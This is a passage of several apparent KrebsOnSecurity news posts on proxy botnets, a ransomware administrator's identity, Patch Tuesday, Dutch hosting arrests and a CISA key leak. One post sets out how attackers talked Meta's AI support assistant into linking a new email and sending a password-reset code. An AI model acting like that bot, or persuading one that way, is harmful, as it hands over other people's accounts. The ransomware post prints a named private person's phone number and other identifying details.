Qurium said it found several dozen domains used to control Popa that were all hosted in lockstep across multiple Internet addresses over time, including gmslb[.]net, safernetwork[.]io, tera-home[.]com, and ninjatech[.]io. Digging deeper, Qurium discovered gmslb[.]net was referenced in dozens of pirated or modded video content streaming apps, such as CRICFy, DooFlix, Sprozfy, RTS Tv, Flixoid, CyberFlix, Rapid Streamz, TvMob and HD/OceanStreams.

Qurium’s report notes that most of the domains long used to control the Popa botnet were seized or dismantled in July 2025, after Google, HUMAN Security and Trend Micro teamed up to disrupt Badbox 2.0, a botnet that is closely associated with Vo1d. Qurium said that immediately after that disruption, several dozen new domains were registered to serve as controllers for the Popa botnet, but that one of those control domains was not new: ninjatech[.]io.

Ninjatech is a company founded by Moishi Kramer, whose LinkedIn profile says he is vice president of research and development at NetNut. That resume credits Kramer for helping NetNut to build from the “ground up,” “designing the architecture,” and “scaling the NetNut” before the company was acquired by Alarum Technologies. A self-created listing at the job board F6S references Kramer as the sole owner of the Ninjatech domain (a screen capture of it is pictured below).

Image: F6S.com.

Responding via email, Mr. Kramer said Ninjatech ceased operations approximately five years ago, when the company sold a software development kit (SDK) called Popa that was designed to use a small portion of a device’s bandwidth and to run only after the host application obtained user consent.

“That code was sold and licensed to third parties including resellers years ago,” Kramer said. “Once software is distributed that way, the original developer has no control over how others later modify, rebrand, or deploy it.”

Kramer said neither he nor NetNut builds, operates or maintains the infrastructure being described as Popa, nor does he control the Ninjatech domain.

“I didn’t register the June 2025 domains you mention, and I don’t know who did,” he continued. “I have no control over, or visibility into, that infrastructure. I can only tell you it isn’t operated by me or by NetNut.”

But in a separate Popa research report released today, the proxy-tracking company Synthient said a recent analysis of the Popa SDK revealed outbound traffic clearly associated with NetNut.

“The research team assesses with high confidence that devices running Popa forward traffic from Netnut clients,” Synthient wrote. “This proves without a shadow of a doubt that Popa actively continues to be used by NetNut as part of their proxy pool.”

Synthient’s platform receiving outbound traffic from Popa. Image: Synthient.com.

Alarum Technologies, NetNut’s Tel Aviv-based parent company, said the reports by Synthient and Qurium contained “demonstrably inaccurate assertions and flawed deductions rather than verified facts.” Alarum shared a statement saying they reject the basic characterization of the SDKs and technologies discussed in the reports as a “botnet.”

“The SDKs at issue are designed to facilitate bandwidth-sharing functionality and do not transform user devices into malware-controlled systems or otherwise compromise the devices on which they operate,” the statement reads. “Netnut operates a commercial proxy network and maintains policies, procedures, and technological measures designed to promote lawful and responsible use of its services.”

Alarum said NetNut places “significant emphasis on appropriate notice and consent mechanisms, conducts customer due diligence, monitors for potential misuse, and takes steps intended to detect and mitigate suspicious or unauthorized activity.”

“This method of operation is supported both by internal procedures and policies, including performing KYC checks and additional due diligence of NetNut’s customers, as well as employing various technological measures, designed to assist in identifying and addressing suspected misuse of the network,” their statement continued.

However, in a report released on June 8, the proxy tracking service Spur asserted that NetNut does not require corporate verification or meaningful “know your customer” procedures before allowing customers to purchase proxy access.

“An individual can sign up, pay, and route traffic through partner address space, including space belonging to institutions whose users never opted in,” Spur wrote. “The ‘verified corporations only’ claim is simply marketing for bandwidth sellers, not an access control on who actually uses the proxies.”

“Nor is NetNut the only front door,” Spur continued. “A number of downstream white labelers and resellers repackage the same ISP proxy pool under their own brands. These outlets typically perform no KYC at all, less scrutiny than NetNut itself, who at the very least might assign an account manager to potential users. Anyone who knows where to look can buy access through a reseller with nothing more than a burner email address and $5 in crypto.”

Synthient found that although the most recent builds of Popa (as of three months ago) have added the ability to ask the user for consent before installing proxy components, not all variants or previous versions of Popa contain this functionality.

“Of the over 20 genuine Popa publishers analyzed, none of them were observed asking for user consent,” Sythient wrote.

THE PREVALENCE OF POPA

Chris Formosa is senior lead information security engineer for Black Lotus Labs, a division of the Internet backbone carrier Lumen Technologies.

“What especially makes Popa dangerous is just how widely used NetNut is for reselling and sharing,” Formosa said, explaining that many other proxy services simply resell NetNut proxies rather than building out their own far-flung proxy networks. “So these Popa IPs appear in tons of different services all over the ecosystem, which makes it one of the most problematic and dangerous proxy botnets on the market currently.”

Formosa said the Popa botnet averages between 1.5 million to 2.5 million distinct IP addresses each day, relying on between 250 and 300 Internet addresses that are used to direct its activities.

“That’s why Popa is so dangerous,” Formosa said. “It may not be the largest botnet we have seen, but it is spread all over the industry, making its power very amplified.”

Formosa said while that makes Popa one of the larger botnets out there today, its numbers pale in comparison to those previously boasted by IPIDEA, a China-based proxy provider that until recently operated a daily pool of nearly 10 million devices that they resold as proxies to anyone. In January 2026, Synthient published research showing that multiple new large DDoS botnets had grown rapidly by tunneling through IPIDEA proxies into the local networks of unsuspecting TV box owners and infecting other Android-based devices behind the user’s firewall.

IPIDEA is based largely on SDKs used to view pirated streaming content on a vast number of TV box devices, but the service’s numbers have dwindled since January, when Google and industry partners took legal action to seize domain names that IPIDEA used to control devices and proxy traffic through them.

Jérôme Meyer, a security researcher at Nokia Deepfield, said the total population of devices participating in the Popa botnet may be far higher than Lumen’s estimates. Meyer told KrebsOnSecurity that Nokia is monitoring 26 of at least 359 known relay nodes for the botnet, and estimates that each relay node handles between 35,000 and 60,000 clients simultaneously.

“On the relay node subset I am looking at (26 of them), 750,000 unique sources in 24 hours,” Meyer wrote in response to questions.

Nokia Deepfield released its own report today on RoboVPN, a VPN app tied to the Vo1d botnet’s Popa plugin that Qurium attributes to NetNut/Alarum Technologies.

THE SYMBIOSIS OF PROXIES AND DATA SCRAPING

Experts say many of the world’s largest proxy providers have updated their public-facing branding to highlight their utility for training AI platforms, implying it is a primary use case for their residential proxies. That’s because AI services tend to rely on constantly mass-scraping the Internet for new text, images and video content that can be used to train large language models (LLMs).

NetNut and other proxy services have recast themselves as critical infrastructure for the AI scraping economy. Image: Synthient.com.

“AI companies depend on web-scraped content: for pre-training, for retrieval, for agent grounding, for search,” reads a report this month from Include Security that examines the prevalence of proxy SDKs in smart TV apps. “But the modern web isn’t scrapeable from a datacenter. Cloudflare, DataDome, HUMAN, among others throttle or block requests from known cloud IPs. The workaround is residential proxies. A scraping job routed through a Comcast or T-Mobile subscriber’s connection arrives at the target site from an IP that belongs to a paying residential customer.”

This non-stop content scraping has spawned more than 70 copyright infringement lawsuits against major tech companies that have acknowledged large-scale data scraping as a major source of the “brains” behind their commercial AI offerings. Ironically, much of that scraping is being aided by proxy services that are intimately tied to unofficial Android TV boxes and associated SDKs whose stated purpose is streaming pirated content.

The scraping activity has become so aggressive that it often overwhelms the targeted websites, preventing them from being reachable by legitimate visitors. In many reported cases, nonprofit organizations, libraries and universities have complained of constantly battling to keep their services online in the face of relentless data-scraping firms hiding behind residential proxy services.

A survey conducted last year by the Confederation of Open Access Repositories (COAR) found while some content scraping bots are rather innocuous, “others are sufficiently aggressive that they are increasingly causing service disruptions in repositories and other scholarly communications infrastructures.” More than 90 percent of survey respondents indicated their repository is encountering aggressive bots, usually more than once a week, and often leading to slow downs and service outages.

“Automated web scraping is nothing new, and has been the key technology underlying search engines such as Google for over 30 years,” wrote Brendan O’Connell, platform manager at the Directory of Open Access Journals (DOAJ), a free, community-curated index of peer-reviewed academic journals. “However, the current investor-fueled AI startup craze means there are now thousands of well-funded companies developing and deploying their own scraping tools to train AI models, alongside existing major players like OpenAI and Google.”

DON’T TOUCH THAT DIAL!

Across the United States, local communities are pushing back against the proliferation of new data centers aimed primarily at improving the capabilities of AI. But security experts say the general public remains largely unaware that using one of these unsanctioned Android TV boxes means their “smart TV” is almost certainly using a significant amount of bandwidth each month to help train modern AI models.

Even households without these sketchy TV boxes can still have their smart TVs turned into residential proxy nodes, just by downloading one of thousands of apps made available on Samsung and LG smart TVs. Spur said it recently scraped the LG and Samsung app stores and found that each had approximately 3,000 apps available for download. Many of these apps are simple games or utilities that state in the fine print that the user’s Internet connection will be used to download data and that they can opt out at any time.

Spur said it found that more than 42 percent of apps available for download via the webOS operating system on LG smart TVs include SDKs that turn one’s television into an always-on residential proxy node. More than a quarter of the apps made for Samsung’s Tizen operating system had similar residential proxy components, Spur found.

Image: Spur.us.

Experts say it’s questionable whether TV apps with proxy SDKs can obtain meaningful consent from users for installing an always-on proxy connection, particularly when anyone in a household — including children — can effectively opt the family TV into a residential proxy network just by installing a simple game or app.

“Privacy-policy disclosure is the wrong control surface for a TV,” Include Security wrote. “It is hard to scroll through a legal document navigated by arrow keys on a remote, and the in-app consent dialog doesn’t convey that a paying customer is about to route their scraping traffic through the user’s home internet.”

Spur’s head of research Sean Simmons told KrebsOnSecurity that most people do not have a working mental model for what it means to sell access to their residential IP address, no matter what device they are using.

“And on a TV, the gap is even wider,” Simmons said. “A one-time prompt navigated with a remote can disappear into the setup flow, while the app keeps monetizing the connection long after anyone remembers what they accepted.”

Simmons said LG and Samsung should follow the lead of other TV platforms that have already drawn a line against residential proxy providers, pointing to policies by Amazon that prohibit apps facilitating proxy services for third parties. Likewise the TV streaming device maker Roku reportedly now bars developers from using proxy SDKs and has removed apps that bundled them.

Piracy related apps pushing proxy SDKs onto unconsenting users. Image: Synthient.

Apps that turn one’s device into a residential proxy node are not limited to smart TVs and no-name streaming boxes, of course. As noted by the security firm Infoblox, mobile app developers can embed SDKs provided by the residential proxy networks into their products to monetize their software, allowing them to receive a small amount of money on each installation.

The result, Infoblox said, is that devices are frequently enrolled without the owner’s knowledge, typically through free applications such as VPNs, streaming apps, screensavers and “productivity” apps such as PDF viewers and break reminders.

All too often, these proxy services are beaconing out from employee devices brought into the workplace, Infoblox found. In a blog post earlier this month, Infoblox said it discovered that fully 65% of its customer base was querying one or more residential proxy related domains.

“We saw steady growth in these queries in 2025, with a 25% increase over the year to over 500 billion per month,” Infoblox wrote. “Over 90% of our pharmaceutical and food & beverage customers have queried residential proxy indicators. Perhaps even more concerning is that over 60% of government and banking customers have as well.”

Infoblox researchers Nick Sundvall and David Brunsdon warned that with residential proxies in the corporate environment, external access is granted to an organization’s IP space.

“If threat actors were to abuse the residential proxy to attack a third party, the third party’s incident response would, correctly, identify your residential proxy as the source,” they wrote. “Untangling that, by proving that you were the conduit and not the threat actor, costs time, creates legal exposure, and can damage your reputation. The stunning prevalence of these services within customer environments warrants attention from both network defenders and policy makers who should consider how the risks posed by residential proxies could be impacting their security posture.”

Who Runs the Ransomware Group ‘The Gentlemen?’

Krebs on Security Jun 10, 2026 · 16:03

A cybercrime group known as The Gentlemen has emerged as the second most active ransomware gang by victim count, rapidly attracting a talented pool of hackers through an aggressive recruitment strategy that promises affiliates 90 percent of any ransom paid by victims. This post examines clues pointing to a real life identity for the administrator of The Gentlemen ransomware group.

A graphic created and shared by The Gentlemen ransomware group administrator Hastalamuerte on Breachforums in May 2026. Credit: ke-la.com.

Experts at the security firm Check Point Software have been closely covering exploits of The Gentlemen, a so-called “ransomware-as-a-service” (RaaS) offering that pays affiliates handsomely to help spread the group’s malware.

“A 90/10 affiliate revenue split — compared to the industry standard 80/20 — is accelerating the group’s growth by attracting experienced operators from competing programs,” the researchers wrote in April.

Check Point found The Gentlemen are the second most active ransomware group by victim count so far this year, claiming at least 332 published victims since the group’s inception in mid-2025 and more than 240 in 2026 alone.

According to Check Point, the group targets Internet-facing devices (VPNs, firewalls) as their entry point, and once inside moves quickly to encrypt entire networks within hours.

Check Point says the administrator and primary operator of the ransomware group uses the nickname Zeta88 on the Russian-language cybercrime forums, and that this individual was previously known under the moniker Hastalamuerte. Check Point noted that a breach of the group’s backend infrastructure made it clear that Hastalamuerte/Zeta88 is the person who assembles the locker and RaaS panel, manages payments, and is essentially the administrator of the entire program who receives 10 percent of all ransoms.

WHO IS HASTALAMUERTE?

The cyber intelligence firm Intel 471 shows that the user Hastalamuerte is a Russian and English speaking person who registered on almost a dozen cybercrime forums between 2019 and the present day, including Exploit, Breachforums, Ramp_V2, BHF, Raidforums, and Nulled.

Intel 471 reveals that Hastalamuerte registered on Breachforums in January 2025 from an Internet address in Izhevsk, the capital city of Russia’s Udmurt Republic. Likewise, the user Zeta88 signed up at the English-language cybercrime forum Breached in August 2022 from a different Internet address in Izhevsk.

Intel 471 finds Hastalamuerte registered on Raidforums in 2020 using the email address [email protected] (1488 is a common combination of two numeric symbols associated with white supremacy). A lookup on this address at the open source intelligence service Epieos shows it is connected to an account at Apple and to a phone number ending in 04.

Epieos says that Protonmail address is also linked to a GitHub account under the username SantaMuerte. That account is marked private, but a history of this user’s activity shows they are watching and developing a number of malware tools and exploits.

In April 2020, Hastalamuerte said on the crime forum Nulled that they could be contacted at the Telegram instant messenger name @hastalamuerte18, and the threat intelligence company Flashpoint finds this username is assigned the unique Telegram ID number 30907522 [full disclosure: Flashpoint is an advertiser on this blog].

The breach tracking service Constella Intelligence reports that Hastalamuerte’s Telegram ID is connected to another username — “bu4vs” — and to the Russian phone number 79127650004. Pivoting on this phone number in Constella fetches multiple records from hacked Russian government databases showing it is assigned to one Alexander Andreevich Yapaev, a 36-year-old from Izhevsk.

Constella reveals that phone number was used to create an account at the Russian social media platform Pikabu under the name “4apai18,” and shows Mr. Yapaev has signed up at a number of websites using the common surname Ivanov, or else “Chapaev” (the numeral 4 is often used as shorthand for a “ch” sound in Russian).

A search in Intel 471 for cybercrime forum members with the nickname SantaMuerte unearths an account by the same name created in 2020 on the Russian hacking forum Codeby. Intel 471 shows this user originally registered on Codeby with the not-so-subtle nickname Alexandr 4apaev.

Constella finds Mr. Yapaev regularly used the email address [email protected]. Meanwhile, Epieos shows this address is connected to a LinkedIn account for Alexander Yapaev, who lists himself as the head of B2B marketing at the company Uralenergo Udmurtia, one of Russia’s largest suppliers of electrotechnical and lighting products.

Mr. Yapaev did not respond to multiple requests for comment.

Nearly every time we publish one of these Breadcrumbs stories, readers are curious to know why it seems like so many cybercriminals from Russia apparently do little to hide their real life identities. The truth is that — Russian or not — most didn’t exactly set out to be arch criminals, but instead got drawn into the scene gradually over several years as their skills broadened and sharpened.

Another important dynamic is that the Russian government generally either co-opts or ignores cybercriminal activity within its borders so long as the hackers do not steal from or attack Russian businesses and citizens. As a result, successful cybercriminals in Russia are usually insulated from prosecution and arrest by foreign law enforcement agencies provided they occasionally pay off the right people and do not travel abroad. And cybercriminals who intend to strictly adhere to those unwritten rules may (at least initially) be less concerned about covering their tracks online.

But the simplest explanation is that cybercriminals of all nationalities tend to make a number of basic operational security mistakes early in their careers, when they are less savvy and have far less to lose by their carelessness. A review of Hastalamuerte’s early posts on the crime forums (circa 2019-2020) shows a relatively unsophisticated and low-skilled hacker still trying to learn the ropes and earn a positive reputation on these communities.

For example, in June 2020 Hastalamuerte’s Telegram account joined a multi-month training program (@pntst) to learn how to use popular penetration testing tools, and their candid posts to this hacker training camp show Hastalamuerte struggling to use these tools effectively. A Google-translated record of Hastalmuerte’s posts to @pntst is here.

Update, June 11, 10:23 a.m. ET:  The threat research group PRODAFT has released a detailed writeup on the history and current operations of The Gentlemen. PRODAFT said its findings match the same persona with “high confidence,” and found the administrator (Zeta88/Hastalamuerte) supplies affiliates with initial access directly, primarily Fortinet SSL-VPN credentials obtained through brute-force attacks or sourced from the group’s own leak database. They also discovered the administrator is using AI to develop and maintain the ransomware and associated tooling, as well as to assist with post-exploitation activity.

A Record-Breaking Patch Tuesday for June 2026

Krebs on Security Jun 10, 2026 · 00:07

Microsoft today released software updates to plug nearly 200 security holes across its Windows operating systems and supported software, a record number of fixes for the company’s monthly Patch Tuesday cycle. Nearly three dozen of those bugs earned Microsoft’s most dire “critical” rating, and exploit code for at least three of the weaknesses is now publicly available.

The software giant said in a blog post last month that both its engineers and the security community are increasing using artificial intelligence tools to find bugs, meaning this month’s heavy Patch Tuesday may start to become the norm, said Satnam Narang, senior staff research engineer at Tenable.

“Some surveys put AI usage among security professionals generally at 90%, so it’s unsurprising that this volume of patches may be the norm,” Narang said. “Pandora’s proverbial box has been opened, and as more advanced AI models become available, we expect the norm to continue upward across the board, not just for Patch Tuesday.”

June’s zero-day bugs include CVE-2026-49160, a denial of service vulnerability affecting a range of web servers, including Microsoft Internet Information Services (IIS). Microsoft says the flaw was reported by OpenAI’s Codex.

Two of the zero-days addressed this month appear to stem from recent vulnerability disclosures by Nightmare Eclipse, the nickname chosen by a security researcher who has been dropping exploits for various Windows flaws. One of those, dubbed “GreenPlasma,” leverages an elevation of privilege weakness in the Windows Collaborative Translation Framework, the same framework patched today in CVE-2026-45586.

Nightmare Eclipse also last month released “YellowKey,” an exploit for a Windows BitLocker vulnerability that allows an attacker with physical access to view encrypted data, and CVE-2026-50507 is a patch for an elevation of privilege bug in BitLocker.

Microsoft received heavy blowback on social media last month after it said in a blog post that it was considering taking legal action against the security researcher. The company later clarified on Twitter/X that while it has no intention of pursuing legal actions against researchers, it would report them to authorities if they break the law. The advisories for CVE-2026-49160 and CVE-2026-50507 do not credit any researchers in the acknowledgement section, saying only that “Microsoft recognizes the efforts of those in the security community who help us protect customers through coordinated vulnerability disclosure.”

Nightmare Eclipse claims to be a former employee of Microsoft, although Microsoft has not responded to questions about this claim. Rapid7 notes that a recent blog post by Nightmare Eclipse included an image of Albert Wesker, a character from the Resident Evil video game series who formerly worked as a researcher for a technology company before going rogue.

Nightmare Eclipse has pledged to release even more zero-day exploits for Windows in what they called a “bone shattering” drop planned for July 14 (the same day as next month’s Patch Tuesday). Immediately following the release of Microsoft patches today, the researcher published an exploit for what they claimed was a zero-day bug in Windows Defender.

While 200 vulnerabilities may be a record for Patch Tuesday, the actual number of security flaws Microsoft addressed this month is far higher, said Rapid7’s Adam Barnett.

“So far this month, Microsoft has provided patches to address 360 browser vulnerabilities, which is an order of magnitude more than has been typical in any given month over the past few years,” Barnett wrote. “As usual, browser [flaws] are not included in the Patch Tuesday count above. Indeed, the vast, and presumably sustained, uptick in the number of browser vulnerabilities has led to Microsoft no longer enumerating Chromium CVEs in the Security Update Guide.”

Microsoft also patched a zero-day vulnerability in Visual Studio Code that allows attackers to steal GitHub tokens with a single click. The company was forced to push a stopgap fix for the flaw on June 3, after a researcher published instructions showing how to exploit it. The researcher said they opted not to work with Microsoft because of a recent experience wherein Redmond silently patched a flaw they reported without offering credit or recognition.

Microsoft battled its own internal zero-day emergencies last week, after at least 72 of the company’s public code repositories were infected with a variant of the Shai-Hulud worm. Researchers found that all of the affected packages were connected to Microsoft official Azure Durable Task SDK, which got hit by the same Shai-Hulud worm in May.

Other major software makers are also shipping outsized update bundles this month. Adobe has released updates to fix a massive number of critical vulnerabilities across a range of products, including Adobe Experience Manager, Acrobat Reader and Cold Fusion. On June 3, Google resolved a whopping 429 vulnerabilities in its latest Chrome browser update (Chrome automatically downloads updates but installing them usually requires a complete restart of the browser).

As ever, please consider backing up your data before applying operating system updates, and drop a note in the comments if you run into any problems with this month’s patches.

Further reading:

Microsoft’s Security Update Guide

Action1’s Patch Tuesday breakdown

SANS Internet Storm Center notes on Patch Tuesday

Hackers Used Meta’s AI Support Bot to Seize Instagram Accounts

Krebs on Security Jun 1, 2026 · 19:32

The Instagram accounts for the Obama White House and the Chief Master Sergeant of the U.S. Space Force were briefly defaced with pro-Iranian images and messages over the weekend, after instructions began circulating on Telegram showing how to trick Meta’s “AI support assistant” bot into resetting account passwords.

A screenshot from a video released on Telegram claiming to show how Meta’s AI customer support bot could be tricked into resetting a target’s password.

On May 31, word began to spread on several Telegram instant message channels that Meta’s AI bot would happily add an email address to an existing account as part of the bot’s standard password reset flow.

A video released on Telegram by pro-Iran hackers claimed to document a remarkably simple exploit that appears to have involved using a VPN connection with an IP address that is in or near the target’s usual hometown, requesting a password reset for the account, and then choosing to chat with Meta’s AI support assistant. From there, the video shows the attacker told the bot to link the account in question to a new email address, after which the bot dutifully sent that address a one-time code that allowed a password reset.

The Telegram account that posted the video also linked to screenshots of pro-Iran images, videos and messages that defaced the hacked Instagram accounts, saying hackers had used the exploit to hijack a number of valuable (read: short) Instagram account names that allegedly have a resale value of more than a half million dollars.

Meta has not responded to requests for comment on the video’s claims, but Meta’s Andy Stone said on Twitter/X that the issue had been resolved and that they were securing impacted accounts. The security blog thecybersecguru.com reports that Meta pushed an emergency patch over the weekend, and clarified that no back end database was breached.

“Instagram has notoriously poor human support infrastructure,” Cybersecguru wrote. “Recovering a locked account – especially a high-value one can take weeks of back-and-forth with an automated ticketing system. Meta’s solution was to deploy a conversational AI layer to handle common recovery workflows: relinking a lost email address, triggering a password reset, verifying account ownership. The assistant, presumably, was supposed to reduce friction for legitimate users stuck in account-access hell.”

Ian Goldin, a threat researcher at Lumen’s Black Lotus Labs, said we’re entering unchartered security territory as more large online platforms start allowing AI chatbots to handle sensitive account recovery requests. Just like human customer support employees can be social engineered into providing unauthorized access to someone’s account, AI bots are equally eager to help and vulnerable to persuasion and trickery, he said.

“AI chatbots create interesting new attack surface, and we’re likely going to see a lot more of these kinds of attacks,” Goldin said.

Securing your various online accounts means taking full advantage of the most secure form of multi-factor authentication (MFA) offered (such as a passkey or security key). In this case, even using the least robust form of MFA that Instagram offers — a one-time code sent via SMS — likely would have blocked the exploit: The hackers who released the video on Telegram said their exploit failed to work against any accounts that had MFA enabled.

Netherlands Seizes 800 Servers, Arrests 2 for Aiding Cyberattacks

Krebs on Security May 25, 2026 · 15:21

Authorities in the Netherlands have arrested the co-owners of two related Internet hosting companies for operating IT infrastructure used by Russia to carry out cyberattacks, influence operations and disinformation campaigns inside the European Union. The two men were the focus of a 2025 KrebsOnSecurity story about how their hosting companies had assumed control over the technical infrastructure of Stark Industries Solutions, an Internet service provider sanctioned last year by the EU as a frequent staging ground for cyber mischief from Russia’s intelligence agencies.

An investigator with the Tax Intelligence and Investigation Service (FIOD), the Dutch financial crimes agency, during the raid. Image: FIOD.

The Dutch daily news outlet de Volkskrant reports that the Dutch financial crime agency FIOD on May 18 arrested a 57-year-old from Amsterdam and a 39-year-old from The Hague, charging them with violating sanctions law by directly or indirectly making economic resources available to EU-sanctioned entities.

The Dutch investigation focuses on Stark Industries, a sprawling hosting provider that materialized just two weeks before Russia invaded Ukraine. As detailed in this May 2024 deep-dive, Stark quickly became the source of massive distributed denial-of-service (DDoS) attacks against European targets, and emerged as a top supplier of proxy and anonymity services that showed up time and again in cyberattacks linked to Russia-backed hacking groups.

That report identified two Moldovan brothers — Ivan and Yuri Neculiti and their company PQHosting — who were providing one of Stark’s two main conduits to the larger Internet. In May 2025, the EU sanctioned PQHosting and the Neculiti brothers for aiding Russia’s hybrid warfare efforts. But as KrebsOnSecurity observed in September 2025, those sanctions failed to target Stark’s remaining connection to the Internet — an Internet service provider based in the Netherlands called MIRhosting.

MIRhosting is operated by Andrey Nesterenko, a 39-year-old Russian native who runs the business out of the Netherlands.  News that PQHosting and the Neculiti brothers were about to be sanctioned by the EU leaked in the media nearly two weeks before the sanctions were announced last year. During that time, the Stark network assets were transferred from PQHosting to a new entity called the[.]hosting, under the control of the Dutch entity WorkTitans BV.

And as our September 2025 report showed, WorkTitans was controlled by Nesterenko and a 57-year-old from Amsterdam named Youssef Zinad. On top of that, WorkTitans was getting connectivity to the larger Internet solely through MIRhosting, where Zinad had worked previously.

On May 18, Dutch financial crime investigators arrested Nesterenko and Zinad, and searched three businesses in Enschede and Almere and two data centers in Dronten and Schiphol-Rijk. A statement from the Dutch authorities said they also seized laptops, telephones and more than 800 servers.

A message to the-hosting customers immediately after 800 of its servers were seized by Dutch authorities. The message says that unfortunately data stored on the server has been lost and cannot be recovered.

De Volkskrant said it reviewed data showing WorkTitans and MIRhosting were the most-used networks in pro-Russian attacks on Danish government bodies between November 13 and 19, 2025, the week of Denmark’s municipal elections.

The publication wrote that prior to Nesterenko’s arrest, the MIRhosting founder denied that he knew his servers had been misused by pro-Russian cybercriminals. “He said he had ended all services with the Neculiti brothers when the EU sanctions came into force in May 2025,” and the he “reserved all rights to take action against ‘harmful and incorrect publications,” de Volkskrant wrote.

MIRhosting released a statement saying it has initiated an internal investigation into the alleged facts concerning the elections in Denmark, and that it has temporarily paused services to WorkTitans as a precautionary measure while the matter is being reviewed further.

“Based on our preliminary findings, there are no indications that the services over which we exercise control were actually used to influence the Danish elections,” the statement reads. “No anomalies or spikes were observed in our network traffic during the period mentioned in the publication; had large-scale DDoS attacks occurred, such activity would have been evident. Furthermore, prior to the media publication, we had not received any complaints, abuse reports, or official requests regarding suspicious activities or misuse of our network. Meanwhile, our regular operational activities continue, and our service to our other clients remains fully intact.”

Born in Nizhny Novgorod, Russia, Mr. Nesterenko grew up as a piano prodigy who performed publicly at a young age. In 2004, Nesterenko founded MIRhosting’s parent Innovation IT Solutions Corp., which has the notable distinction of being the company responsible for hosting stopgeorgia[.]ru, a hacktivist website for organizing cyberattacks against Georgia that appeared at the same time Russian forces invaded the former Soviet nation in 2008. That conflict was thought to be the first war ever fought in which a notable cyberattack and an actual military engagement happened simultaneously.

Responding to questions shared via email, Nesterenko said MIRhosting does not support cybercrime, sanctions evasion, or illegal activity, and that the allegations and arrest by Dutch authorities have been extremely harmful to him and his company.

“The transition to the.hosting was not intended to evade sanctions,” Nesterenko wrote. “The hardware and customer portfolio had already been transferred to WorkTitans before the sanctions appeared. Closing or damaging a legitimate Dutch infrastructure company will not stop cybercrime, but it will harm many people who have done nothing wrong.”

Far less is public about the 57-year-old Zinad, who reportedly has been keeping a low profile since our story last year. De Volkskrant reported that Zinad blocked access to his LinkedIn account, had gone months without responding to emails, WhatsApp messages and phone calls, and told a colleague that illness was forcing him to lead a somewhat more reclusive life.

Mr. Zinad’s now-defunct LinkedIn profile. It was full of posts for MIRhosting’s services.

Mr. Nesterenko claims Zinad was never an employee of MIRhosting.

“He helped me and MIRhosting with certain business tasks under a normal business-to-business arrangement between companies,” Nesterenko explained.

However, in previous emails to KrebsOnSecurity, Nesterenko carbon copied Mr. Zinad (who had a @mirhosting.com email), explaining that he was part of the company’s legal team. Also, the Dutch website stagemarkt[.]nl lists Youssef Zinad as an official contact for MIRhosting’s offices in Almere.

Mr. Zinad has never responded to requests for comment. Nor did de Volkskrant have any luck tracking him down. The publication said it repeatedly asked Mr. Zinad (referred to here as simply “Z”), but he reportedly avoided every form of contact.

“‘I am unavailable but will respond to your message as soon as possible,’ reads an automated reply on WhatsApp on 2 October 2025,” de Volkskrant reported. “It is the only response de Volkskrant would receive in months. He did not pick up his phone and did not call back. When an acquaintance asked him via LinkedIn to contact the reporter, he blocked access to his LinkedIn page. At an address in Almere where Z.’s personal limited company is registered, no one was present in April. The corner house’s blinds were drawn, and a pile of rubbish bags lay outside next to a container, as if someone had recently left. A neighbour said he knew the man but did not know where he was staying. Z. was later arrested at a residence in Amsterdam.”

Lawmakers Demand Answers as CISA Tries to Contain Data Leak

Krebs on Security May 22, 2026 · 18:34

Lawmakers in both houses of Congress are demanding answers from the U.S. Cybersecurity & Infrastructure Security Agency (CISA) after KrebsOnSecurity reported this week that a CISA contractor intentionally published AWS GovCloud keys and a vast trove of other agency secrets on a public GitHub account. The inquiry comes as CISA is still struggling to contain the breach and invalidate the leaked credentials.

On May 18, KrebsOnSecurity reported that a CISA contractor with administrative access to the agency’s code development platform had created a public GitHub profile called “Private-CISA” that included plaintext credentials to dozens of internal CISA systems. Experts who reviewed the exposed secrets said the commit logs for the code repository showed the CISA contractor disabled GitHub’s built-in protection against publishing sensitive credentials in public repos.

CISA acknowledged the leak but has not responded to questions about the duration of the data exposure. However, experts who reviewed the now-defunct Private-CISA archive said it was originally created in November 2025, and that it exhibits a pattern consistent with an individual operator using the repository as a working scratchpad or synchronization mechanism rather than a curated project repository.

In a written statement, CISA said “there is no indication that any sensitive data was compromised as a result of the incident.” But in a May 19 a letter (PDF) to CISA’s Acting Director Nick Andersen, Sen. Maggie Hassan (D-NH) said the credential leak raises serious questions about how such a security lapse could occur at the very agency charged with helping to prevent cyber breaches.

“This reporting raises serious concerns regarding CISA’s internal policies and procedures at a time of significant cybersecurity threats against U.S. critical infrastructure,” Sen. Hassan wrote.

A May 19 letter from Sen. Margaret Hassan (D-NH) to the acting director of CISA demanded answers to a dozen questions about the breach.

Sen. Hassan noted that the incident occurred against the backdrop of major disruptions internally at CISA, which lost more than a third of it workforce and almost all of its senior leaders after the Trump administration forced a series of early retirements, buyouts, and resignations across the agency’s various divisions.

Rep. Bennie Thompson (D-MS), the ranking member on the House Homeland Security Committee, echoed the senator’s concerns.

“We are concerned that this incident reflects a diminished security culture and/or an inability for CISA to adequately manage its contract support,” Thompson wrote in a May 19 letter to the acting CISA chief that was co-signed by Rep. Delia Ramirez (D-Ill), the ranking member of the panel’s Subcommittee on Cybersecurity and Infrastructure Protection. “It’s no secret that our adversaries — like China, Russia, and Iran — seek to gain access to and persistence on federal networks. The files contained in the ‘Private-CISA’ repository provided the information, access, and roadmap to do just that.”

KrebsOnSecurity has learned that more a week after CISA was first notified of the data leak by the security firm GitGuardian, the agency is still working to invalidate and replace many of the exposed keys and secrets.

On May 20, KrebsOnSecurity heard from Dylan Ayrey, the creator of TruffleHog, an open-source tool for discovering private keys and other secrets buried in code hosted at GitHub and other public platforms. Ayrey said CISA still hadn’t invalidated an RSA private key exposed in the Private-CISA repo that granted access to a GitHub app which is owned by the CISA enterprise account and installed on the CISA-IT GitHub organization with full access to all code repositories.

“An attacker with this key can read source code from every repository in the CISA-IT organization, including private repos, register rogue self-hosted runners to hijack CI/CD pipelines and access repository secrets, and modify repository admin settings including branch protection rules, webhooks, and deploy keys,” Ayrey told KrebsOnSecurity. CI/CD stands for Continuous Integration and Continuous Delivery, and it refers to a set of practices used to automate the building, testing and deployment of software.

KrebsOnSecurity notified CISA about Ayrey’s findings on May 20. Ayrey said CISA appears to have invalidated the exposed RSA private key sometime after that notification. But he noted that CISA still hasn’t rotated leaked credentials tied to other critical security technologies that are deployed across the agency’s technology portfolio (KrebsOnSecurity is not naming those technologies publicly for the time being).

